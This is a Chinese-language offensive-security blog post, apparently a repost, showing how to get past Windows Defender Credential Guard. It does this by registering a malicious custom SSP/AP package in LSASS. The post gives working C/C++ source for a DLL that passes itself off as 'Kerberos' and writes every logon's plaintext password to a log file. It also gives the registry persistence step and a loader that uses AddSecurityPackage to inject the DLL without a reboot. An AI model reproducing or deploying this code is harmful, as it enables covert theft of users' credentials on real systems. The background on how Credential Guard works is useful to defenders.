实战 | 绕过自定义SSP的凭证保护抓取密码

wangqiang

​实战 | 绕过自定义SSP的凭证保护抓取密码
原创 BuNny HACK学习呀 2023-02-08 10:20 发表于广东
转载自：实战 | 绕过自定义SSP的凭证保护抓取密码

0. 背景
为了避免攻击者转储用户的凭据信息，从 Windows 10 1507 企业版和 Windows Server 2016 开始，微软引入了 Windows Defender Credential Guard 安全控制机制，
其使用基于虚拟化的安全性来隔离机密，依次保护 NTLM 密码哈希、Kerberos TGT 票据和应用程序存储为域凭据的凭据来防止凭据盗窃、哈希传递或票据传递等攻击。
在 Windows 10 之前，LSA 将操作系统所使用的密码存储在其进程内存中。启用 Windows Defender Credential Guard 后，操作系统中的 LSA 进程与存储和保护这些密钥的新组件
（称为隔离的 LSA 进程，Isolated LSA Process）进行通信。独立 LSA 进程存储的数据使用基于虚拟化的安全性进行保护，操作系统的其余部分无法访问。LSA 使用远程过程调用来与隔离的 LSA 进程进行通信。
下图简要概述了如何使用基于虚拟化的安全性来隔离 LSA：

​

Source：How Credential Guard works

如果我们在启用了 Credential Guard 的系统上尝试使用 Mimikatz 从 LSASS 进程内存中提取凭证，我们会观察到以下结果。

​

如上图所示，我们无法从 LSASS 内存中提取任何凭据，NTLM 哈希处显示的是 “LSA Isolated Data: NtlmHash”。并且，即便已经通过
修改注册表启用了 Wdigest，也依然获取不到任何明凭据。
为了进行比较，下图所示为不受 Credential Guard 保护的系统上的输出。

​

从 Windows 11 Enterprise, Version 22H2 和 Windows 11 Education, Version 22H 开始，兼容系统默认已启用 Windows Defender Credential Guard。

1. 基础知识
1.1 自定义安全包
自定义安全包 API 支持组合开发自定义安全支持提供程序（SSP），后者为客户端/服务器应用程序提供非交互身份验证服务和安全消息交换，以及开发自定义身份验证包，
为执行交互式身份验证的应用程序提供服务。这些服务在单个包中合并时称为安全支持提供程序/身份验证包（SSP/AP）。
SSP/AP 中部署的安全包与 LSA 完全集成。使用可用于自定义安全包的 LSA 支持函数，开发人员可以实现高级安全功能，例如令牌创建、 补充凭据支持和直通身份验证。
如果我们自定义安全支持提供程序/身份验证包（SSP/AP），并将其注册到系统，当用户重新进行交互式身份验证时，系统就会同通过我们自定义的 SSP/AP 传递明文凭据，
这意味着我们可以提取到明文凭据并将其保存下来。这样便可以绕过 Credential Guard 的保护机制。
SSP/AP 安全包，为了同时执行身份验证包（AP）和安全支持提供程序（SSP），可以作为操作系统的一部分以及作为用户应用程序的一部分执行。这两种执行模式分别称为 LSA 模式
和用户模式。这里我们需要的是 LSA 模式。
下面简单介绍一下关于 LSA 模式的初始化。

1.2 LSA 模式初始化
启动计算机系统后，本地安全机构（LSA）会自动将所有已注册的安全支持提供程序/身份验证包（SSP/AP）的 DLL 加载到其进程空间中，下图显示了初始化过程。

​

“Kerberos” 表示 Microsoft Kerberos SSP/AP，“My SSP/AP” 表示包含两个自定义安全包的自定义 SSP/AP。

启动时，LSA 调用每个 SSP/AP 中的 SpLsaModeInitialize() 函数，以获取指向 DLL 中每个安全包实现的函数的指针，函数指针以 SECPKG_FUNCTION_TABLE 结构数组的形式传递给 LSA。

​

收到一组 SECPKG_FUNCTION_TABLE 结构后，LSA 将调用每个安全包的 SpInitialize() 函数。LSA 使用此函数调用传递给每个安全包一个 LSA_SECPKG_FUNCTION_TABLE 结构，
其中包含指向安全包调用的 LSA 函数的指针。除了存储指向 LSA 支持函数的指针外，自定义安全包还应使用 SpInitialize() 函数的实现来执行任何与初始化相关的处理。
在这里，我们的 SSP/AP 安全包需要实现下表中所示的几个函数。
[td]               

由 SSP/AP 实现的函数	说明
SpInitialize	执行初始化处理，并提供一个函数指针列表。
SpShutDown	在卸载 SSP/AP 之前执行所需的任何清理。
SpGetInfo	提供有关安全包的一般信息，例如其名称、描述和功能。
SpAcceptCredentials	将为经过身份验证的安全主体存储的凭据传递给安全包。

1.3 由 SSP/AP 实现的函数
以下函数由我们自定义的安全支持提供程序/身份验证包（SSP/AP）实现，本地安全机构（LSA）通过使用 SSP/AP 的 SpLsaModeInitialize 函数提供的 SECPKG_FUNCTION_TABLE 结构来访问这些函数。
SpInitialize
SpInitialize 函数由本地安全机构（LSA）调用一次，用于执行任何与初始化相关的处理，并提供一个函数指针列表，其中包含安全包调用的 LSA 函数的指针。
函数声明如下：

1. NTSTATUS Spinitializefn(
   
2.   [in] ULONG_PTR PackageId,
   
3.   [in] PSECPKG_PARAMETERS Parameters,
   
4.   [in] PLSA_SECPKG_FUNCTION_TABLE FunctionTable
   
5. );

复制代码

参数如下：

• [in] PackageId：LSA 分配给每个安全包的唯一标识符。该值在重新启动系统之前有效。
• [in] Parameters：指向包含主域和计算机状态信息的 SECPKG_PARAMETERS 结构的指针。
• [in] FunctionTable：指向可以安全包调用的 LSA 函数的指针列表。
  

SpShutDown
SpShutDown 函数在卸载安全支持提供程序/身份验证包 (SSP/AP) 之前，由本地安全机构（LSA）调用，用于在卸载 SSP/AP 之前执行所需的任何清理，以便释放资源。
函数声明如下：

1. NTSTATUS SpShutDown(void);

复制代码

这个函数没有参数。
SpGetInfo
SpGetInfo 函数提供有关安全包的一般信息，例如其名称和功能描述。客户端调用安全支持提供程序接口（SSPI）的 QuerySecurityPackageInfo 函数时，将调用 SpGetInfo 函数。
函数声明如下：

1. NTSTATUS Spgetinfofn(
   
2.   [out] PSecPkgInfo PackageInfo
   
3. );

复制代码

参数如下：

• [out] PackageInfo：指向由本地安全机构（LSA）分配的 SecPkgInfo 结构的指针，必须由包填充。
  

SpAcceptCredentials
SpAcceptCredentials 函数由本地安全机构（LSA）调用，以将为经过身份验证的安全主体存储的任何凭据传递给安全包。为 LSA 存储的每组凭据调用一次此函数。
函数声明如下：

1. NTSTATUS Spacceptcredentialsfn(
   
2.   [in] SECURITY_LOGON_TYPE LogonType,
   
3.   [in] PUNICODE_STRING AccountName,
   
4.   [in] PSECPKG_PRIMARY_CRED PrimaryCredentials,
   
5.   [in] PSECPKG_SUPPLEMENTAL_CRED SupplementalCredentials
   
6. );

复制代码

参数如下：

• [in] LogonType：指示登录类型的 SECURITY_LOGON_TYPE 值。
• [in] AccountName：指向存储登录帐户名称的 UNICODE_STRING 结构的指针。
• [in] PrimaryCredentials：指向包含登录凭据的 SECPKG_PRIMARY_CRED 结构的指针。
• [in] SupplementalCredentials：指向包含特定于包的补充凭据的 ECPKG_SUPPLEMENTAL_CRED 结构的指针。
  

2. 编程实现
通过 C/C++ 创建一个名为 CustSSP 的 DLL 项目，实现自定义 SSP/AP 包。由于篇幅限制，笔者仅提供关键代码部分。

1. #include "pch.h"
   
2. 
   
3. static SECPKG_FUNCTION_TABLE SecPkgFunctionTable[] = {
   
4.     {
   
5.     NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL,
   
6.     _SpInitialize, _SpShutDown, _SpGetInfo, _SpAcceptCredentials,
   
7.     NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL,
   
8.     NULL, NULL, NULL, NULL, NULL, NULL, NULL
   
9.     }
   
10. };
    
11. 
    
12. NTSTATUS NTAPI _SpInitialize(ULONG_PTR PackageId, PSECPKG_PARAMETERS Parameters, PLSA_SECPKG_FUNCTION_TABLE FunctionTable)
    
13. {
    
14.     return STATUS_SUCCESS;
    
15. }
    
16. 
    
17. NTSTATUS NTAPI _SpShutDown(void)
    
18. {
    
19.     return STATUS_SUCCESS;
    
20. }
    
21. 
    
22. NTSTATUS NTAPI _SpGetInfo(PSecPkgInfoW PackageInfo)
    
23. {
    
24.     PackageInfo->fCapabilities = SECPKG_FLAG_ACCEPT_WIN32_NAME | SECPKG_FLAG_CONNECTION;
    
25.     PackageInfo->wVersion = 1;
    
26.     PackageInfo->wRPCID = SECPKG_ID_NONE;
    
27.     PackageInfo->cbMaxToken = 0;
    
28.     PackageInfo->Name = (SEC_WCHAR*)L"Kerberos";
    
29.     PackageInfo->Comment = (SEC_WCHAR*)L"Microsoft Kerberos V5.0";
    
30.     return STATUS_SUCCESS;
    
31. }
    
32. 
    
33. NTSTATUS NTAPI _SpAcceptCredentials(SECURITY_LOGON_TYPE LogonType, PUNICODE_STRING AccountName, PSECPKG_PRIMARY_CRED PrimaryCredentials, PSECPKG_SUPPLEMENTAL_CRED SupplementalCredentials)
    
34. {
    
35.     const wchar_t* LSA_LOGON_TYPE[] = {
    
36.         L"UndefinedLogonType",
    
37.         L"Unknown !",
    
38.         L"Interactive",
    
39.         L"Network",
    
40.         L"Batch",
    
41.         L"Service",
    
42.         L"Proxy",
    
43.         L"Unlock",
    
44.         L"NetworkCleartext",
    
45.         L"NewCredentials",
    
46.         L"RemoteInteractive",
    
47.         L"CachedInteractive",
    
48.         L"CachedRemoteInteractive",
    
49.         L"CachedUnlock",
    
50.     };
    
51. 
    
52.     FILE* logfile;
    
53. 
    
54.     if (_wfopen_s(&logfile, L"CustSSP.log", L"a") == 0)
    
55.     {
    
56.         SspLog(
    
57.             logfile,
    
58.             L">>>>=================================================================\n"
    
59.             L"[+] Authentication Id : %u:%u (%08x:%08x)\n"
    
60.             L"[+] Logon Type        : %s\n"
    
61.             L"[+] User Name         : %wZ\n"
    
62.             L"[+] Domain            : %wZ\n"
    
63.             L"[+] Logon Server      : %wZ\n"
    
64.             L"[+] SID               : %s\n"
    
65.             L"[+] SSP Credential    : \n"
    
66.             L"\t* UserName    : %wZ\n"
    
67.             L"\t* Domain      : %wZ\n"
    
68.             L"\t* Password    : ",
    
69.             PrimaryCredentials->LogonId.HighPart,
    
70.             PrimaryCredentials->LogonId.LowPart,
    
71.             PrimaryCredentials->LogonId.HighPart,
    
72.             PrimaryCredentials->LogonId.LowPart,
    
73.             LSA_LOGON_TYPE[LogonType],
    
74.             AccountName,
    
75.             &PrimaryCredentials->DomainName,
    
76.             &PrimaryCredentials->LogonServer,
    
77.             SidToString(PrimaryCredentials->UserSid),
    
78.             &PrimaryCredentials->DownlevelName,
    
79.             &PrimaryCredentials->DomainName
    
80.         );
    
81.         SspLogPassword(logfile, &PrimaryCredentials->Password);
    
82.         SspLog(logfile, L"\n");
    
83.         fclose(logfile);
    
84.     }
    
85.     return STATUS_SUCCESS;
    
86. }
    
87. 
    
88. NTSTATUS NTAPI _SpLsaModeInitialize(ULONG LsaVersion, PULONG PackageVersion, PSECPKG_FUNCTION_TABLE* ppTables, PULONG pcTables)
    
89. {
    
90.     *PackageVersion = SECPKG_INTERFACE_VERSION;
    
91.     *ppTables = SecPkgFunctionTable;
    
92.     *pcTables = ARRAYSIZE(SecPkgFunctionTable);
    
93.     return STATUS_SUCCESS;
    
94. }

复制代码

在 CustSSP 中，我们依次实现了 SpInitialize、SpShutDown、SpGetInfo 和 SpAcceptCredentials 函数，并定义了一个名为 SecPkgFunctionTable 的 SECPKG_FUNCTION_TABLE 结构，用于存储指向这些函数的指针。
之后，我们通过定义 .def 文件将 CustSSP 中定义的 SpLsaModeInitialize 函数导出，如下所示。该函数会被本地安全机构（LSA）调用一次，从而将 CustSSP 中实现的函数的指针提供给 LSA。

1. LIBRARY
   
2. EXPORTS
   
3.     SpLsaModeInitialize  = _SpLsaModeInitialize

复制代码

3. 运行效果演示
将编译生成的 CustSSP.dll 置于 C:\Windows\System32 目录中，并将 “CustSSP” 添加到以下注册表值的数据中，如下图所示。
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Lsa\Security Packages

通常，SSP/AP DLL 存储在 %SystemRoot%/System32 目录中。如果这是自定义 SSP/AP DLL 的路径，则不包括路径作为 DLL 名称的一部分。但是，如果 DLL 位于其他路径中，请在名称中包含 DLL 的完整路径。

​

当目标主机重新启动并进行交互式身份验证后，将在 C:\Windows\System32\CustSSP.log 中记录当前登录用户的明文密码，如下图所示。

​

成功利用该方法的条件是必须重新启动目标系统。因此只有启动计算机系统后，本地安全机构（LSA）才会自动将已注册的 SSP/AP 的 DLL 加载到其进程空间中。
然而，利用某些 Windows API，我们可以在不重启的情况下添加 SSP/AP。

4. 利用 AddSecurityPackage API 来加载 SSP/AP
AddSecurityPackage 是一个 SSPI 函数，用于将安全支持提供程序添加到提供程序列表中，该函数声明如下。

1. SECURITY_STATUS SEC_ENTRY AddSecurityPackageW(
   
2.   [in] LPSTR                     pszPackageName,
   
3.   [in] PSECURITY_PACKAGE_OPTIONS pOptions
   
4. );

复制代码

参数如下：

• [in] pszPackageName：要添加的包的名称。
• [in] pOptions：指向 SECURITY_PACKAGE_OPTIONS 结构的指针，该结构指定有关安全包的其他信息。
  

通过 C/C++ 创建一个名为 AddSSP 的项目，其代码如下所示。

1. #define SECURITY_WIN32
   
2. 
   
3. #include <stdio.h>
   
4. #include <Windows.h>
   
5. #include <Security.h>
   
6. #pragma comment(lib,"Secur32.lib")
   
7. 
   
8. int wmain(int argc, char** argv) {
   
9. 
   
10.     SECURITY_PACKAGE_OPTIONS option;
    
11.     option.Size = sizeof(option);
    
12.     option.Flags = 0;
    
13.     option.Type = SECPKG_OPTIONS_TYPE_LSA;
    
14.     option.SignatureSize = 0;
    
15.     option.Signature = NULL;
    
16.    
    
17.     // AddSecurityPackageW 默认在 System32 目录中搜索 CustSSP.dll
    
18.     if (AddSecurityPackageW((LPWSTR)L"CustSSP", &option) == SEC_E_OK)
    
19.     {
    
20.         wprintf(L"[*] Add security package successfully\n");
    
21.     }
    
22. }

复制代码

编译并生成 AddSSP.exe 后，运行 AddSSP.exe 即可成功将 CustSSP.dll 添加到系统。需要注意的是，以上代码仅将 CustSSP 加载到 LSASS 进程中，系统重启后会失效，
因此仍需将 “CustSSP” 添加到 Security Packages 注册表并将 CustSSP.dll 置于 C:\Windows\System32 目录中。
当用户输入用户名密码重新进行身份验证时，我们重新得到了他的明文密码，如下图所示。

​

​

原创投稿作者：BuNny
文章首发：先知社区
​